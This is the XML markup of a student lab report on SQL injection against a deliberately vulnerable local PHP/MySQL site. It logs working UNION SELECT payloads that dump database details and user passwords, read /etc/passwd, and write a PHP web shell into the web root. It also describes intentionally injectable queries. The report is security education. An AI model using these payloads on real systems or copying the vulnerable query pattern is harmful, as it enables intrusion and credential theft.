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79D7" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00177CCC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ECE78E0" wp14:editId="41FFE757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29B6" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF019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5E6B07A7" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B117805" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00177CCC" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7836364C" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193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52CE03AF" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193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44703700" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193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FFAE075" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193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68199BB" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193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4F381BC" w14:textId="2E949CE3" w:rsidR="00AF0193" w:rsidRPr="00177CCC" w:rsidRDefault="00AF0193" w:rsidP="00AF019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Advanced SQL Injection – Exploitation and Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC4EB3A" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00177CCC" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:pPr>
        <w:pStyle w:val="p1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</w:p>
    <w:p w14:paraId="5980F96B" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00177CCC" w:rsidRDefault="00AF0193" w:rsidP="00AF019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43ED66B2" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00177CCC" w:rsidRDefault="00AF0193" w:rsidP="00AF0193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058998EE" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00021AC0" w:rsidRDefault="00AF0193" w:rsidP="00AF019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0ABC82E9" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00021AC0" w:rsidRDefault="00AF0193" w:rsidP="00AF0193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7CF6CAB4" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00021AC0" w:rsidRDefault="00AF0193" w:rsidP="00AF019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22CB6616" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="701815DB" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="670B77C7" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C7C1564" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F4DA2C7" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="206A731A" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00177CCC" w:rsidRDefault="00AF0193" w:rsidP="00AF019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25</w:t>
      </w:r>
      <w:r w:rsidRPr="00177CCC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</w:rPr>
        <w:t>JAN/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16014EFB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lastRenderedPageBreak/>
        <w:t>1. Database and Schema Initialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3FA336" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve">To begin the lab, I had to set up the backend environment. I used </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF0193">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>phpMyAdmin</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve"> at http://localhost/phpmyadmin to create a database named </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>vulnerable_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve">. Within this database, I built two tables to simulate a real web application environment: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>a users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve"> table for logins and a products table for the search feature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63653903" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:r w:rsidRPr="00AF0193">
        <w:t>First, I created the users table using the following SQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0548E85E" w14:textId="6A5A6018" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:r w:rsidRPr="00AF0193">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63BA8338" wp14:editId="7B05D4F1">
            <wp:extent cx="5943600" cy="2044700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1979221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D982" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:r w:rsidRPr="00AF0193">
        <w:t>I finished the setup by inserting three sample products so that the search page would have content to display during my initial tests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3106079A" w14:textId="7EF9609F" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193"/>
    <w:p w14:paraId="4F5E5B56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2. Web Application Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E2DB84" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve">Once the database was ready, I moved to the web server side. I created a folder named </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>vulnerable_app</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve"> in the /opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>lampp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>htdocs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>/ directory. I wrote six separate PHP files to build out the site's functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CDE191" w14:textId="0D16AE9C" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:r w:rsidRPr="00AF0193">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03A3179F" wp14:editId="7FEFC196">
            <wp:extent cx="5943600" cy="1720850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1961077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C9B9" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193"/>
    <w:p w14:paraId="270C38A9" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:r w:rsidRPr="00AF0193">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">I started with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve"> to handle the connection between PHP and MySQL. I then created </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>db.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve">, which is the most important file for this lab because it contains the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>get_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve">) and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>get_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>products</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>) functions. I wrote these queries using direct variables (like '$username'), which makes them intentionally vulnerable to injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE67FD7" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:r w:rsidRPr="00AF0193">
        <w:t>The rest of the application consisted of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C329C8" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>: A simple homepage to link everything together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3526ACDB" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>register.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>: A registration form that I used to study second-order injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C2272D" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>: A login page where I could test blind injection techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E65A61D" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>search.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>: A search bar that displays results directly to the screen, making it perfect for error-based injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025B4944" w14:textId="234E90C2" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F08DEE2" wp14:editId="508CF121">
            <wp:extent cx="5943600" cy="3251200"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="2001078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BFFD" w14:textId="40C4EF1E" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193"/>
    <w:p w14:paraId="4F8DFCF0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3. Systematic Exploitation Log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152D6D97" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:r w:rsidRPr="00AF0193">
        <w:t>After the site was live, I began testing for vulnerabilities. I confirmed the site was vulnerable by entering a single quote (') into the search bar, which caused a database error. This showed me that the input was not being sanitized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CCD807" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57DC9DD9" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD201A4" w14:textId="7A883EC2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lastRenderedPageBreak/>
        <w:t>3.1 Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3595A481" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:r w:rsidRPr="00AF0193">
        <w:t>I used UNION SELECT payloads to pull system information out of the database and display it on the search page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D4BDFB" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF0193">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database Version:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve"> ' UNION SELECT NULL, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>version(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>), NULL #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653211A0" w14:textId="1BCD5D76" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09B44E72" wp14:editId="3673617E">
            <wp:extent cx="5943600" cy="1600200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1615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6DF3" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24892D36" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF0193">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database Name:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve"> ' UNION SELECT NULL, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>database(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>), NULL #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D06C44" w14:textId="7EEACB89" w:rsidR="00F07353" w:rsidRDefault="00F07353" w:rsidP="00F07353">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15F3D21D" wp14:editId="721EA497">
            <wp:extent cx="5943600" cy="1536700"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1059425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B05C" w14:textId="77777777" w:rsidR="00F07353" w:rsidRPr="00AF0193" w:rsidRDefault="00F07353" w:rsidP="00F07353">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D984117" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF0193">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System User:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve"> ' UNION SELECT NULL, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>user(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>), NULL #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B87928" w14:textId="7DB639C6" w:rsidR="00F07353" w:rsidRDefault="00F07353" w:rsidP="00F07353">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44934485" wp14:editId="0C4A9365">
            <wp:extent cx="5943600" cy="1492250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="552784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FE2A" w14:textId="77777777" w:rsidR="00F07353" w:rsidRPr="00AF0193" w:rsidRDefault="00F07353" w:rsidP="00F07353">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1505EC58" w14:textId="24055020" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF0193">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">I wanted to see how many tables were in the system, so I ran: ' UNION SELECT NULL, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>COUNT(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve">*), NULL FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E241F9" w14:textId="37DC5198" w:rsidR="00F07353" w:rsidRDefault="00F07353" w:rsidP="00F07353">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18BF9C77" wp14:editId="0D4F577F">
            <wp:extent cx="5943600" cy="2230755"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="406623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F8F8" w14:textId="77777777" w:rsidR="00F07353" w:rsidRPr="00AF0193" w:rsidRDefault="00F07353" w:rsidP="00F07353">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F48AF68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3.2 Data Extraction and File Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74350217" w14:textId="4FB3A810" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:r w:rsidRPr="00AF0193">
        <w:t>I focused on stealing user data. Since I knew the column names, I was able to pull the passwords and usernames directly onto the screen using</w:t>
      </w:r>
      <w:r w:rsidR="00F07353">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F07353">
        <w:t xml:space="preserve">‘ </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF0193">
        <w:t>UNION</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve"> SELECT password, username, NULL FROM users #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFBDF79" w14:textId="24DC0D78" w:rsidR="00F07353" w:rsidRPr="00F07353" w:rsidRDefault="00F07353" w:rsidP="00F07353">
      <w:r w:rsidRPr="00F07353">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14B279EB" wp14:editId="363B8B95">
            <wp:extent cx="5943600" cy="1822450"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="182838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B23A" w14:textId="77777777" w:rsidR="00F07353" w:rsidRPr="00AF0193" w:rsidRDefault="00F07353" w:rsidP="00AF0193"/>
    <w:p w14:paraId="3DD88A71" w14:textId="399EAEBD" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:r w:rsidRPr="00AF0193">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00F07353">
        <w:t xml:space="preserve"> then</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve"> tested if I could read files from the server's hard drive. I used the LOAD_FILE function to try and view the Linux password file</w:t>
      </w:r>
      <w:r w:rsidR="00F07353">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve">' UNION SELECT NULL, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>load_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>('/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>/passwd'), NULL #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8F316B" w14:textId="1A6497E7" w:rsidR="00F07353" w:rsidRPr="00F07353" w:rsidRDefault="00F07353" w:rsidP="00F07353">
      <w:r w:rsidRPr="00F07353">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61FEFF26" wp14:editId="3125C766">
            <wp:extent cx="5943600" cy="2184400"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="2018722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DA4A" w14:textId="77777777" w:rsidR="00F07353" w:rsidRPr="00AF0193" w:rsidRDefault="00F07353" w:rsidP="00AF0193"/>
    <w:p w14:paraId="3743D47D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3.3 Remote Code Execution (RCE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403B852B" w14:textId="66A16C60" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:r w:rsidRPr="00AF0193">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00F07353">
        <w:t xml:space="preserve"> then</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve"> attempted the most dangerous part of the lab</w:t>
      </w:r>
      <w:r w:rsidR="00F07353">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF0193">
        <w:t>writing a file to the server. I injected a small piece of PHP code (a web shell) into the web directory using the INTO OUTFILE command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4670A095" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:r w:rsidRPr="00AF0193">
        <w:t>' UNION SELECT NULL, '&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve"> echo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>shell_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>($_GET["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>"])</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>; ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>&gt;', NULL INTO OUTFILE '/opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>lampp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>htdocs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>' #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D58666" w14:textId="75C63604" w:rsidR="005453D1" w:rsidRPr="00AF0193" w:rsidRDefault="005453D1" w:rsidP="00AF0193">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
